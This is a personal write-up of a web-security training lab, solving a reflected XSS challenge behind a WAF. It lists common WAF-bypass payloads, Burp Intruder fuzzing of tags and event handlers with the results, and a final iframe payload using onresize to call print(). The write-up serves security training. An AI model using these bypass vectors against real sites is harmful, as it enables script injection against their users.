Task
This lab contains a reflected XSS vulnerability in the search functionality but uses a web application firewall (WAF) to protect against common XSS vectors.
To solve the lab, perform a cross-site scripting attack that bypasses the WAF and calls the print() function.
Note
Your solution must not require any user interaction. Manually causing print() to be called in your own browser will not solve the lab.
Attempt
So this is a reflexted xss lab but it shoudn’t require any user interaction? Okay the lab has the exploit server. I should use this.
First, put this into the search function:
<><img src=# onerror=print()>
Got tag is not allowed message.
I didn’t have a clue about the WAF they used so I just tried common WAF bypasses.
cloudflare
<svg/onrandom=random onload=print()>
<video onnull=null onmouseover=print()>
no
Akamai:
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
no
wordfence:
<a href=javascript:alert(1)>
no
fortiweb:
\u003e\u003c\u0068\u0031 onload=print()\u003e
This passed but the function didn’t work.
I can’t keep doing this so let’s use burp’s intruder. From burp xss cheat sheet, I copied all the tags and pasted into intruder.
Select the position between <> and started fuzzing.
GET /?search=<§§> HTTP/2
I found out body is allowed.
Next, fuzzed events:
GET /?search=<body%20§§=print()> HTTP/2
List of allowed tags:
|0||200|307|false|false|3489||
|10|onbeforeinput|200|358|false|false|3502||
|13|onbeforetoggle|200|385|false|false|3503||
|17|oncancel|200|304|false|false|3497||
|23|oncontentvisibilityautostatechange|200|321|false|false|3523||
|24|oncontentvisibilityautostatechange(hidden)|200|383|false|false|3531||
|33|ondragexit|200|395|false|false|3499||
|46|onformdata|200|352|false|false|3499||
|74|onpointercancel|200|362|false|false|3504||
|85|onratechange|200|406|false|false|3501||
|88|onresize|200|329|false|false|3497||
|90|onscrollend|200|359|false|false|3500||
|91|onscrollsnapchange|200|371|false|false|3507||
|100|onsuspend|200|394|false|false|3498||
|119|onwebkitfullscreenchange|200|320|false|false|3513||
|120|onwebkitmouseforcechanged|200|312|false|false|3514||
|121|onwebkitmouseforcedown|200|286|false|false|3511||
|122|onwebkitmouseforceup|200|306|false|false|3509||
|123|onwebkitmouseforcewillbegin|200|299|false|false|3516||
I first tried onwebkitfullscreenchange but it seemed modern browsers prohibit an automatic full screen request. So I chose onresize.
Set this at the exploit server:
<iframe src="https://0a94001004ef162c802adf6300cd000b.web-security-academy.net/?search=%3Cbody%20onresize%3Dprint()%3E" onload=this.style.width='500px'>
Delivered this to the victim and successfully solved the lab.